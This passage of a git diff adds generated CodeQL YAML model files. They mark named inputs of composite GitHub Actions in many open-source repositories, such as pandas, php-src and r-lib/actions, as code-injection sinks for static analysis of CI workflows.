@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml new file mode 100644 index 000000000000..e6c66721c3f0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml new file mode 100644 index 000000000000..668e681473df --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml new file mode 100644 index 000000000000..13c965ae30a3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml new file mode 100644 index 000000000000..726aab85e84e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oracle/graal", "*", "input.components", "code-injection", "generated"] + - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml new file mode 100644 index 000000000000..4325315c595d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml new file mode 100644 index 000000000000..11da4a457089 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml new file mode 100644 index 000000000000..4064d556702f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml new file mode 100644 index 000000000000..c8d29fbe9f9c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["owntracks/android", "*", "input.name", "code-injection", "generated"] + - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml new file mode 100644 index 000000000000..5be8efeee399 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml new file mode 100644 index 000000000000..4b4e290a9cba --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..6f56ef896d3d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml new file mode 100644 index 000000000000..1520e1fa3b12 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml new file mode 100644 index 000000000000..2d0a5e4f6d6c --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml new file mode 100644 index 000000000000..c4224e600572 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.token", "code-injection", "generated"] + - ["php/php-src", "*", "input.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml new file mode 100644 index 000000000000..b452fb2ebd53 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..e75842caa3f2 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml new file mode 100644 index 000000000000..53a35fdd9d92 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml new file mode 100644 index 000000000000..ca216f3b0912 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml new file mode 100644 index 000000000000..25107038af5f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["primer/react", "*", "input.token", "code-injection", "generated"] + - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml new file mode 100644 index 000000000000..04132df42bf5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml new file mode 100644 index 000000000000..ca7d52c45a96 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml new file mode 100644 index 000000000000..3e42add86504 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml new file mode 100644 index 000000000000..c0b4d00d5e5a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml new file mode 100644 index 000000000000..505790a2c9ad --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml new file mode 100644 index 000000000000..ebb4ebff5e30 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml new file mode 100644 index 000000000000..fcac2d1554da --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml new file mode 100644 index 000000000000..a4fc1bd993de --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml new file mode 100644 index 000000000000..6831b4406bc7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quay/clair", "*", "input.tag", "code-injection", "generated"] + - ["quay/clair", "*", "input.repo", "code-injection", "generated"] + - ["quay/clair", "*", "input.quay", "code-injection", "generated"] + - ["quay/clair", "*", "input.duration", "code-injection", "generated"] + - ["quay/clair", "*", "input.token", "code-injection", "generated"] + - ["quay/clair", "*", "input.dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml new file mode 100644 index 000000000000..c669f9be2f89 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml new file mode 100644 index 000000000000..ef7bf632aee7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml new file mode 100644 index 000000000000..1aa3eedfe897 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["randombit/botan", "*", "input.target", "code-injection", "generated"] + - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml new file mode 100644 index 000000000000..aa9670d3de3c --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml new file mode 100644 index 000000000000..79cc879fa67c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml new file mode 100644 index 000000000000..f8964efbc562 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml new file mode 100644 index 000000000000..102d0aa85e56 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml new file mode 100644 index 000000000000..c1743b69eb21 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml new file mode 100644 index 000000000000..47a1811b49f7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml new file mode 100644 index 000000000000..9941f981d758 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml new file mode 100644 index 000000000000..eac3e751bdea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml new file mode 100644 index 000000000000..3c613a4eb882 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "input.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml new file mode 100644 index 000000000000..b846058b3f06 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml new file mode 100644 index 000000000000..7337d8896f37 --- /dev/null 
